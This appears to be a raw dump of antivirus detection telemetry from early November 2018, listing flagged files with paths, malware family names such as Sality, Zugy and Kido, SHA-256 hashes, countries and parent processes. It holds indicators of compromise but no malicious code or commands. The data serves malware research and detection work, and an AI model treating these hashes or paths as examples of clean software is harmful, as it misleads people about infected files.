  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050635-0a828da0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050635-0A828DA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060723-88ea49fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060723-88EA49FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060113-ac7deb6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060113-AC7DEB6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155633-c76a8653', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155633-C76A8653', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153716-49154720', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc69a243\\AVSCAN-20181101-153638-439513BB\\AVSCAN-20181101-153716-49154720', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160215-00f9f191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160215-00F9F191', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155414-afef1191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155414-AFEF1191', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155753-d4c54f02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155753-D4C54F02', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gaji csv.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\LPA.UPAH.2015\\GAJI CSV\\GAJI CSV.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh376a.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH376A.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files (x86)\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:00:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hrd_garment.pif', filepath='D:\\DATA_SHARE\\program\\HRD_GARMENT\\HRD_GARMENT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\E:\\huong dan etabs\\CSI.ETABS.2015.v15.0.0.1221.x64_tailieuxd.com\\CSI.ETABS.2015.v15.0.0.1221.x64_tailieuxd.com\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T05:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2366891\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\gta-san-andreas-programas-gratis-net_1433065135.exe', parentsize=2308292, timestamp='2018-11-01T01:12:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180442-6860d2e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180028-3AA46632\\AVSCAN-20181101-180442-6860D2E7', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2948169\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\JavaSetup_0346492589.exe', parentsize=2399158, timestamp='2018-11-01T15:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231229-0bb89c55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668207b8\\AVSCAN-20181101-224116-DA675AA0\\AVSCAN-20181101-231229-0BB89C55', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='free test & post test.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\soal free test & post test\\free test & post test.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-43-08.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T02:53:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 32.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\TEMUAN CAP AEON\\NC 32\\NC 32.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 35.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\CAP GSM\\NC 35\\NC 35.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:07:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T03:52:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e71f8f548193c3543778dd80a08e35eddbde37bbca705e7ae60b435c7b2a18fa', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\E71F8F548193C3543778DD80A08E35EDDBDE37BBCA705E7AE60B435C7B2A18FA', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='e71f8f548193c3543778dd80a08e35eddbde37bbca705e7ae60b435c7b2a18fa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='856ef3fe7f32d162c5970cddbfd18af07dedce063614658d6a75361781fea6b6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\856EF3FE7F32D162C5970CDDBFD18AF07DEDCE063614658D6A75361781FEA6B6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='856ef3fe7f32d162c5970cddbfd18af07dedce063614658d6a75361781fea6b6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Profiles\\Profiles.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rc1uck8.exe', filepath='\\\\?\\L:\\$RECYCLE.BIN\\S-1-5-21-3357244247-2250698326-3409966804-1000\\$RC1UCK8.exe', filesize=768000, name='TR/Dldr.Banload.Gen4.#M300.#R301211'), hash='bbeb7a757f7c702a01121892ad3dca3e29087602e928a614bc2f3095628942c8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='euejh.dll', filepath='C:\\WINDOWS\\system32\\euejh.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fiwllc.exe', filepath='C:\\Windows\\SysWOW64\\fiwllc.exe', filesize=576000, name='HEUR/AGEN.1024618.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\SysWOW64\\fiwllc.exe', parentsize=576000, timestamp='2018-11-01T20:30:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vb.decompiler.pro.v8.3.keygen-fff.exe', filepath='D:\\Decompiler\\VB.Decompiler.Pro.v8.3.KEYGEN-FFF.exe', filesize=320000, name='TR/SPY.320000.6.#M1.#R1'), hash='d1166cbc7a2419c8c207cf4a60944bb73826a2a482f68a0e014a84591ad2d563', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T11:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111936-3bfb0f65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111936-3BFB0F65', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123732-aa747c6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123711-9808F33D\\AVSCAN-20181101-123732-AA747C6C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\A36305778D7E6DB23DCE9E3D4E4106411A9672A4EF65899DB2D9D6B3429CC3FF', filesize=516000, name='TR/ATRAPS.Gen.#M300.#R3887'), hash='a36305778d7e6db23dce9e3d4e4106411a9672a4ef65899db2d9d6b3429cc3ff', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:20:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='bf9fe6ac3f922da11fcd4570b3dba1c67721a1e01c693be6e23c74dc620230ed', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125145-81de229d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125124-7039DD6A\\AVSCAN-20181101-125145-81DE229D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='art blends.exe', filepath='G:\\downloads do pc\\PLUGINS - Magic DeGun 2011 SCTV83\\NewBlue FX\\Art blends.exe', filesize=7168000, name='W32/Sality.AT.#M1.#R1'), hash='d3bc811a8edc56b362db3b60277964defd50f460cfdd3d46d077df081fa64580', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:15:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\59AB2184F2377018262473ACE1914B28815980E336DBFDF2BF94C4EA79380E82', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:15:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e2e22f2b993eecfc810cea038e6c43c416db9e25e3d32fce54b4d9e70856ef5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E2E22F2B993EECFC810CEA038E6C43C416DB9E25E3D32FCE54B4D9E70856EF5D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e2e22f2b993eecfc810cea038e6c43c416db9e25e3d32fce54b4d9e70856ef5d', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:17:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bf69f94933037e18dfc4def414eba3a161b5b9da01a0bcf214791abc9b32758b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\BF69F94933037E18DFC4DEF414EBA3A161B5B9DA01A0BCF214791ABC9B32758B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bf69f94933037e18dfc4def414eba3a161b5b9da01a0bcf214791abc9b32758b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:36:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='8084f671f775f9cc0ce1d51a565b15efcde2fb26f84a3b18999c44b0e76c1ecd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:01:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AC422967F227C1A312CE1B2F61EB45D976BA7E14C60568CB3844E029922B3804', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:17:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='italian.exe', filepath='F:\\New folder\\Corel Draw 12\\Italian\\Italian.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:31Z'), dt=datetime.date(2018, 11, 1)),
